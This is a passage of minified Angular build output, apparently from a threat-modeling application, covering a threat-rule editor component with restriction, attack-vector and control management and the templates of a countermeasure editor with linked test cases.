e),C(3),ct("",re(113,68,"general.Controls")," \n            "),C(2),at("matTooltip",re(115,70,"general.Add")),V("matMenuTriggerFor",e),C(9),ke(re(124,72,"general.New")),C(3),V("matMenuTriggerFor",i),C(1),ke(re(128,74,"general.Existing")),C(7),V("ngForOf",n.GetPossibleControls()),C(4),V("ngForOf",n.GetControls()),C(2),V("ngIf",(null==(r=n.GetVectorControls())?null:r.length)>0),C(6),V("ngIf",n.selectedControl)}}let Gp=(()=>{class t{constructor(e,i,n,r,c){this.theme=i,this.dataService=n,this.dialog=r,this.translate=c,this.canEdit=!0,this.canEditName=!1,this.showAttackVector=!0,this.threatRuleGroups={},this.propertyGroups={},this.phyPropertyGroups={},this.interfacePropertyGroups=null,e&&(this.threatRule=e,this.canEdit=!1)}get threatRule(){return this._threatRule}set threatRule(e){this._threatRule=e,this.selectedRestriction=null,this.propertyGroups={},this.phyPropertyGroups={},this.interfacePropertyGroups=null,this.threatRuleGroups={},this.selectedControl=null}get selectedStencilType(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.StencilRestriction)&&void 0!==i&&i.stencilTypeID)return this.dataService.Config.GetStencilType(this.threatRule.StencilRestriction.stencilTypeID)}get selectedStencilElementType(){var e;return null!==(e=this.selectedStencilType)&&void 0!==e&&e.ElementTypeID?this.dataService.Config.GetStencilElementType(this.selectedStencilType):null}get selectedComponentType(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.ComponentRestriction)&&void 0!==i&&i.componentTypeID)return this.dataService.Config.GetMyComponentType(this.threatRule.ComponentRestriction.componentTypeID)}get selectedProtocol(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.ProtocolRestriction)&&void 0!==i&&i.protocolID)return this.dataService.Config.GetProtocol(this.threatRule.ProtocolRestriction.protocolID)}ngOnInit(){}OnAttackVectorChanged(e){this.threatRule.ThreatCategories=null==e?void 0:e.ThreatCategories}GetAttackVectorGroups(){return this.dataService.Config.GetAttackVectorGroups().filter(e=>e.AttackVectors.length>0)}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetAvailableThreatRuleGroups(){if(!this.threatRuleGroups[this.threatRule.RuleType]){let e=[];if(this.threatRule.RuleType==on.Stencil){let i={Name:this.translate.instant("properties.StencilRules"),ThreatRules:this.dataService.Config.GetThreatRules().filter(n=>n.RuleType==on.Stencil&&n.ID!=this.threatRule.ID)};e.push(i)}else if(this.threatRule.RuleType==on.Component){let i={Name:this.translate.instant("properties.ComponentRules"),ThreatRules:this.dataService.Config.GetThreatRules().filter(n=>n.RuleType==on.Component&&n.ID!=this.threatRule.ID)};e.push(i)}else{let i=n=>{var r,c;(null===(r=n.ThreatRules)||void 0===r?void 0:r.length)>0&&e.push({Name:n.Name,ThreatRules:n.ThreatRules.filter(d=>d.RuleType==on.DFD&&d.ID!=this.threatRule.ID)}),(null===(c=n.SubGroups)||void 0===c?void 0:c.length)>0&&n.SubGroups.forEach(d=>i(d))};i(this.dataService.Config.DFDThreatRuleGroups)}this.threatRuleGroups[this.threatRule.RuleType]=e}return this.threatRuleGroups[this.threatRule.RuleType]}AddStencilRestriction(){this.threatRule.StencilRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:null}})}RemoveStencilRestriction(e){this.threatRule.StencilRestriction.DetailRestrictions.splice(e,1)}AddComponentRestriction(){this.threatRule.ComponentRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!1}})}RemoveComponentRestriction(e){this.threatRule.ComponentRestriction.DetailRestrictions.splice(e,1)}AddProtocolRestriction(){this.threatRule.ProtocolRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!1}})}RemoveProtocolRestriction(e){this.threatRule.ProtocolRestriction.DetailRestrictions.splice(e,1)}HasPhysicalElement(){return this.selectedStencilType?!Sc.IsPhysical(this.selectedStencilType.ElementTypeID):null}EditAttackVector(){this.dialog.OpenViewAttackVectorDialog(this.threatRule.AttackVector,!0)}AddAttackVector(){let e=this.dataService.Config.CreateAttackVector(null);this.dialog.OpenAddAttackVectorDialog(e).subscribe(i=>{i?(this.threatRule.AttackVector=e,this.threatRule.ThreatCategories=e.ThreatCategories):this.dataService.Config.DeleteAttackVector(e)})}AddDFDNode(e){this.threatRule.DFDRestriction.NodeTypes.splice(e,0,{TypeIDs:[]}),this.propertyGroups={}}RemoveDFDNode(e,i){setTimeout(()=>{i.close()},10),this.threatRule.DFDRestriction.NodeTypes.splice(e,1),this.propertyGroups={}}AddDFDNodeRestriction(){this.threatRule.DFDRestriction.NodeRestrictions.push({Layer:0,NodeNumber:-1,IsOR:!1,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:null}})}RemoveDFDNodeRestriction(e){this.threatRule.DFDRestriction.NodeRestrictions.splice(e,1)}GetLayerPadding(e){return(20*e.Layer).toString()+"px"}GetRuleElements(){let e=["Data Flow","Sender"];for(let i=0;i<this.threatRule.DFDRestriction.NodeTypes.length-2;i++)e.push("Node"+(i+1).toString());return e.push("Receiver"),e}OnNextComparisonType(e,i){let n=Object.values(cc),r=n.length;this.GetPropertyEditType(e)==Ii.CheckBox&&(r=2),i.ComparisonType=n[(n.indexOf(i.ComparisonType)+1)%r]}GetPropertyEditType(e){var i,n,r,c,d;let k,T=(q,Y)=>{for(let te=0;te<q.length;te++){let pe=q[te].Properties.find(Re=>Re.ID==Y);if(pe)return pe}};return this.threatRule.RuleType==on.Stencil?e.RestType==ya.Property?k=T(this.propertyGroups[-2],null===(i=e.PropertyRest)||void 0===i?void 0:i.ID):e.RestType==ya.PhysicalElement&&(k=T(this.phyPropertyGroups[Sc.GetPhyiscalID(this.selectedStencilType.ElementTypeID)],null===(r=null===(n=e.PhyElementRest)||void 0===n?void 0:n.Property)||void 0===r?void 0:r.ID)):this.threatRule.RuleType==on.Component?e.RestType==ya.Property&&(k=T(this.propertyGroups[-2],null===(c=e.PropertyRest)||void 0===c?void 0:c.ID)):e.RestType==ya.Property?k=T(this.propertyGroups[e.NodeNumber],null===(d=e.PropertyRest)||void 0===d?void 0:d.ID):e.RestType==ya.PhysicalElement?k=T(this.phyPropertyGroups[e.NodeNumber],e.PhyElementRest.Property.ID):e.RestType==ya.SenderInterface?k=T(this.interfacePropertyGroups,e.SenderInterfaceRestriction.Property.ID):e.RestType==ya.ReceiverInterface&&(k=T(this.interfacePropertyGroups,e.ReceiverInterfaceRestriction.Property.ID)),null==k?void 0:k.Type}GetAvailablePropertyGroups(e){let i=this.threatRule.RuleType==on.DFD?e.NodeNumber:-2;return null==this.propertyGroups[i]&&(this.propertyGroups[i]=this.GetPropertyGroups(e)),this.propertyGroups[i]}GetPropertyGroups(e){if(this.threatRule.RuleType==on.Stencil){let i=this.selectedStencilType;if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(i)}]}else if(this.threatRule.RuleType==on.Component){let i=this.selectedComponentType;if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:i.Properties}]}if(-1==e.NodeNumber)return[{GroupName:"Data Flow's "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(this.dataService.Config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Et.DataFlow))}];if(0==this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length)return[];if(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length>1){let i=[],n={GroupName:this.translate.instant("pages.config.commonProperties"),Properties:[]};i.push(n);let r=[],c=[];this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.forEach(T=>r.push(this.dataService.Config.GetStencilType(T))),r.forEach(T=>c.push(this.dataService.Config.GetAllStencilProperties(T)));let d={GroupName:r[0].Name+"'s "+this.translate.instant("general.Properties"),Properties:[]};c[0].forEach(T=>{c.every(k=>k.some(q=>q.ID==T.ID))?n.Properties.push(T):d.Properties.push(T)}),i.push(d);for(let T=1;T<r.length;T++){let k={GroupName:r[T].Name+"'s "+this.translate.instant("general.Properties"),Properties:[]};c[T].forEach(q=>{n.Properties.some(Y=>Y.ID==q.ID)||k.Properties.push(q)}),i.push(k)}return i=i.filter(T=>T.Properties.length>0),i}{let i=this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]);if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(i)}]}return[]}GetDataFlowEntityTypes(){let e=[],i=[Et.LogProcessing,Et.LogDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.PhysicalLink];return i.forEach(n=>{e.push(...this.dataService.Config.GetStencilTypes().filter(r=>r.IsDefault&&r.ElementTypeID==n))}),i.forEach(n=>{e.push(...this.dataService.Config.GetStencilTypes().filter(r=>!r.IsDefault&&r.ElementTypeID==n))}),e}SetPropertyDefaultValue(e,i){e.ID=i.ID,null!=i.DefaultValue&&(e.Value=i.DefaultValue)}CreatePropertyRestrictionType(e,i){let n={ID:"",ComparisonType:cc.Equals,Value:null};i==ya.DataFlowCrosses?e.DataflowRest||(e.DataflowRest={TrustAreaIDs:[]}):i==ya.PhysicalElement?e.PhyElementRest||(e.PhyElementRest={Property:n}):i==ya.Property?e.PropertyRest||(e.PropertyRest=n):i==ya.SenderInterface?e.SenderInterfaceRestriction||(e.SenderInterfaceRestriction={Property:n}):i==ya.ReceiverInterface&&(e.ReceiverInterfaceRestriction||(e.ReceiverInterfaceRestriction={Property:n}))}GetAvailableTrustAreas(){return this.dataService.Config.GetStencilTypes().filter(e=>e.ElementTypeID==Et.LogTrustArea||e.ElementTypeID==Et.PhyTrustArea)}GetAvailablePhyElementPropertyGroups(e){let i=null;if(this.threatRule.RuleType==on.Stencil?i=Sc.GetPhyiscalID(this.selectedStencilType.ElementTypeID):1==this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length&&(i=Sc.GetPhyiscalID(this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]).ElementTypeID)),i){if(null==this.phyPropertyGroups[i]){let n=this.dataService.Config.GetStencilTypes().find(r=>r.IsDefault&&r.ElementTypeID==i);if(n){let r={GroupName:n.Name+"'s "+this.translate.instant("general.Properties"),Properties:n.Properties};this.phyPropertyGroups[i]=[r]}}return this.phyPropertyGroups[i]}return[]}GetAvailableInterfacePropertyGroups(e){return this.interfacePropertyGroups||(this.interfacePropertyGroups=[{GroupName:"Interface's "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(this.dataService.Config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Et.Interface))}]),this.interfacePropertyGroups}GetRuleGenerationTypes(){return vG.GetTypes()}GetRuleGenerationTypeName(e){return vG.ToString(e)}GetRestrictionString(){return Vg.ToString(this.threatRule,this.dataService,this.translate)}GetAvailableRestrictionsTypes(e){return this.threatRule.RuleType==on.Stencil?this.HasPhysicalElement()?[ya.Property,ya.PhysicalElement]:[ya.Property]:this.threatRule.RuleType==on.Component?[ya.Property]:-1==e.NodeNumber?[ya.Property,ya.DataFlowCrosses,ya.SenderInterface,ya.ReceiverInterface]:1!=this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length||Sc.IsPhysical(this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]).ElementTypeID)?[ya.Property]:[ya.Property,ya.PhysicalElement]}GetRestrictionTypeName(e){return class pwe{static GetTypes(){return[ya.Property,ya.DataFlowCrosses,ya.PhysicalElement,ya.SenderInterface,ya.ReceiverInterface]}static GetTypeNames(){let a=[];return Pl.GetTypes().forEach(e=>a.push(Pl.ToString(e))),a}static ToString(a){switch(a){case ya.Property:return"general.Property";case ya.DataFlowCrosses:return"pages.config.threatrule.trustLevelChange";case ya.PhysicalElement:return"properties.PhysicalElement";case ya.SenderInterface:return"properties.SenderInterface";case ya.ReceiverInterface:return"properties.ReceiverInterface";default:return console.error("Missing Restriction Type in RestrictionTypes.ToString()"),"Undefined"}}}.ToString(e)}GetControls(){return this.dataService.Config.GetControls().filter(e=>e.MitigatedThreatRules.includes(this.threatRule))}GetVectorControls(){return this.threatRule.AttackVector?this.dataService.Config.GetControls().filter(e=>e.MitigatedAttackVectors.includes(this.threatRule.AttackVector)):null}GetPossibleControls(){let e=this.dataService.Config.GetControls().filter(i=>!i.MitigatedThreatRules.includes(this.threatRule));return this.threatRule.AttackVector&&(e=e.filter(i=>!i.MitigatedAttackVectors.includes(this.threatRule.AttackVector))),e}AddExistingControl(e){e.AddMitigatedThreatRule(this.threatRule)}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);e.AddMitigatedThreatRule(this.threatRule),this.selectedControl=e}RemoveControl(e){e.RemoveMitigatedThreatRule(this.threatRule),e==this.selectedControl&&(this.selectedControl=null)}DeleteControl(e){this.dataService.Config.DeleteControl(e),e==this.selectedControl&&(this.selectedControl=null)}dropControl(e,i){const n=this.dataService.Config.GetControls().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetControls().indexOf(i[e.currentIndex]);Qs(this.dataService.Config.GetControls(),n,r)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}SetLWH(e,i){e.Value=Number(i)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetIcon(e){return Sc.Icon(e.ElementTypeID)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Vp,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-rule"]],inputs:{node:"node",threatRule:"threatRule",canEdit:"canEdit",canEditName:"canEditName",showAttackVector:"showAttackVector"},decls:1,vars:1,consts:[["style","margin-left: 10px; margin-top: 10px;",3,"disable",4,"ngIf"],[2,"margin-left","10px","margin-top","10px"],["color","primary",2,"margin-bottom","10px",3,"ngModel","ngModelChange"],["appearance","fill","class","property-form-field",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],[3,"label",4,"ngFor","ngForOf"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"disabled","matTooltip","click"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill",2,"width","150px","margin-left","10px"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["class","expansion-panel-headers-align","style","pointer-events: initial;",4,"ngIf"],["appearance","fill",2,"width","100%"],["multiple","",3,"value","valueChange"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[4,"ngIf"],[1,"row",2,"margin-top","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"label"],[3,"value"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[2,"margin-bottom","20px"],["matExpansionPanelContent",""],[3,"canEdit","attackVector"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["appearance","fill",1,"property-form-field","disable"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","10px"],[4,"ngFor","ngForOf"],["matPrefix","","matInput","","min","0","type","number",2,"width","30px",3,"ngModel","ngModelChange"],[3,"value","click",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["mat-raised-button","","style","margin-left: 10px; vertical-align: super;",3,"click",4,"ngIf"],[3,"value","click"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["mat-raised-button","",2,"margin-left","10px","vertical-align","super",3,"click"],["color","primary",2,"margin-left","10px","vertical-align","super",3,"ngModel","ngModelChange"],[2,"width","75px","margin-left","10px","vertical-align","super",3,"ngModel","change"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super",3,"matTooltip","click"],[1,"btn-icon"],["typeSelect",""],["matSuffix","","mat-icon-button","","style","width: 25px;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","style","vertical-align: super;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill","class","property-form-field","style","margin-left: 10px;",4,"ngIf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"control","canEdit","canEditName","canEditGroup"]],template:function(e,i){1&e&&ne(0,a5e,151,77,"div",0),2&e&&V("ngIf",i.threatRule)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.property-form-field[_ngcontent-%COMP%]{width:300px}.restrictions-column1[_ngcontent-%COMP%]{float:left;width:300px}.restrictions-column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 310px)}.btn-icon[_ngcontent-%COMP%]{opacity:.5}.btn-icon[_ngcontent-%COMP%]:hover{opacity:1}.btn-selected-light[_ngcontent-%COMP%]{opacity:1;background-color:#00000026;border-radius:5px}.btn-selected-dark[_ngcontent-%COMP%]{opacity:1;background-color:#ffffff26;border-radius:5px}']}),t})();const n5e=["nameBox"],o5e=["searchTCBox"];function r5e(t,a){if(1&t){const e=Ye();m(0,"button",30),he("click",function(){return be(e),Me(B(2).countermeasure.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function s5e(t,a){1&t&&(m(0,"mat-hint",31),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function c5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function l5e(t,a){1&t&&(m(0,"mat-icon",33),oe(1,"translate"),s(2,"sync_problem"),u()),2&t&&at("matTooltip",re(1,1,"pages.modeling.countermeasure.ruleNotApplyingAnymore"))}function d5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.Name)}}function m5e(t,a){if(1&t&&(m(0,"mat-form-field",34),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),it(6,"input",35),s(7,"\n  "),u()),2&t){const e=B(2);C(3),ct("",re(4,2,"general.Targets"),"*"),C(3),V("value",e.GetTargetsNames())}}function u5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n        ",e.GetProperty("Name"),"\n      ")}}function h5e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",36),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",37),he("valueChange",function(n){return be(e),Me(B(2).countermeasure.Targets=n)}),s(7,"\n      "),m(8,"mat-option"),s(9),oe(10,"translate"),u(),s(11,"\n      "),ne(12,u5e,2,2,"mat-option",10),s(13,"\n    "),u(),s(14,"\n  "),u()}if(2&t){const e=B(2);C(3),ct("",re(4,5,"general.Targets"),"*"),C(3),at("matTooltip",e.GetTargetsNames()),V("value",e.countermeasure.Targets),C(3),ke(re(10,7,"properties.selectNone")),C(3),V("ngForOf",e.elements)}}function f5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function p5e(t,a){if(1&t&&(m(0,"mat-optgroup",38),s(1,"\n        "),ne(2,f5e,2,2,"mat-option",10),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.name),C(2),V("ngForOf",e.Controls)}}function _5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-control",40),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("control",e.countermeasure.Control)}}function g5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,_5e,3,2,"ng-template",39),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.ControlInfo"),"\n        "),C(4),ct("\n          ",e.countermeasure.Control.Name,"\n          ")}}function C5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-mitigation-process",41),s(2,"\n      ")),2&t){const e=B(3);C(1),V("canEdit",!1)("mitigationProcess",e.countermeasure.MitigationProcess)}}function y5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,C5e,3,2,"ng-template",39),s(16,"\n    "),u()),2&t){const e=B(2);C(5),ct("\n          ",re(6,2,"general.MitigationProcessInfo"),"\n        "),C(4),ct("\n          ",e.countermeasure.MitigationProcess.Name,"\n          ")}}function b5e(t,a){if(1&t&&(s(0,"\n        "),it(1,"app-attack-scenario",42),s(2,"\n      ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("attackScenario",e)}}function M5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n      "),m(2,"mat-expansion-panel-header"),s(3,"\n        "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n        "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n        "),u(),s(13,"\n      "),u(),s(14,"\n      "),ne(15,b5e,3,2,"ng-template",39),s(16,"\n    "),u()),2&t){const e=a.$implicit;C(5),ct("\n          ",re(6,2,"pages.modeling.countermeasure.mitigatedThreats"),"\n        "),C(4),ct("\n          ",null==e?null:e.GetProperty("Name"),"\n          ")}}function v5e(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function A5e(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),C(1),ke(e.Name)}}function T5e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",57),he("click",function(){const r=be(e).$implicit;return Me(B(3).selectedTestCase=r)}),s(1,"\n          "),m(2,"mat-icon",58),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",59),s(6),u(),s(7,"\n          "),m(8,"button",60),he("click",function(){const r=be(e).$implicit;return Me(B(3).OnUnlinkTestCase(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"remove"),u()(),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(3);Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(e.Name),C(2),at("matTooltip",re(9,7,"general.Remove"))}}function E5e(t,a){if(1&t&&(m(0,"div",61),s(1,"\n        "),it(2,"app-test-case",62),s(3,"\n      "),u()),2&t){const e=B(3);C(2),V("testCase",e.selectedTestCase)}}function D5e(t,a){if(1&t){const e=Ye();m(0,"div",43),s(1,"\n    "),m(2,"div",44),s(3,"\n      "),m(4,"mat-list",45),s(5,"\n        "),m(6,"div",46),s(7),oe(8,"translate"),m(9,"button",47),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n          "),m(14,"mat-menu",null,48),s(16,"\n            "),m(17,"input",49,50),he("ngModelChange",function(n){return be(e),Me(B(2).searchTCString=n)})("click",function(){return be(e),Me(B(2).OnSearchTCBoxClick())}),oe(19,"translate"),u(),s(20,"\n            "),ne(21,v5e,2,2,"button",51),s(22,"\n          "),u(),s(23,"\n          "),m(24,"mat-menu",null,52),s(26,"\n            "),ne(27,A5e,2,2,"button",51),s(28,"\n          "),u(),s(29,"\n        "),u(),s(30,"\n        "),ne(31,T5e,13,9,"mat-list-item",53),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n    "),m(35,"div",54),s(36,"\n      "),ne(37,E5e,4,1,"div",55),s(38,"\n    "),u(),s(39,"\n  "),u()}if(2&t){const e=Ti(15),i=Ti(25),n=B(2);C(4),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),C(3),ct("",re(8,14,"properties.LinkedTestCases")," \n          "),C(2),at("matTooltip",re(10,16,"general.Add")),V("matMenuTriggerFor",e),C(8),at("placeholder",re(19,18,"general.Search")),V("ngModel",n.searchTCString)("matMenuTriggerFor",i),C(4),V("ngForOf",n.GetTestCases()),C(6),V("ngForOf",n.GetFilteredTestCases()),C(4),V("ngForOf",n.countermeasure.GetTestCases()),C(6),V("ngIf",n.selectedTestCase)}}function x5e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",1),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(B().countermeasure.Name=n)}),u(),s(10,"\n    "),ne(11,r5e,6,3,"button",4),s(12,"\n  "),u(),s(13,"\n  "),m(14,"mat-form-field",5),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(B().countermeasure.Number=n)}),u(),s(21,"\n    "),ne(22,s5e,3,3,"mat-hint",7),s(23,"\n  "),u(),s(24,"\n  "),it(25,"br"),s(26,"\n  "),m(27,"mat-form-field",8),s(28,"\n    "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n    